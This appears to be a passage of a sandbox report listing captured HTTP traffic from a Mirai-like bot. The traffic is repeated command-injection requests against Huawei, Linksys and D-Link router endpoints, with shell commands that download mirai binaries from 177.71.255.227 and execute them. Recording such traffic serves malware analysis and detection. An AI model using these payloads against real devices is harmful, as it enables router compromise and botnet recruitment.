| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 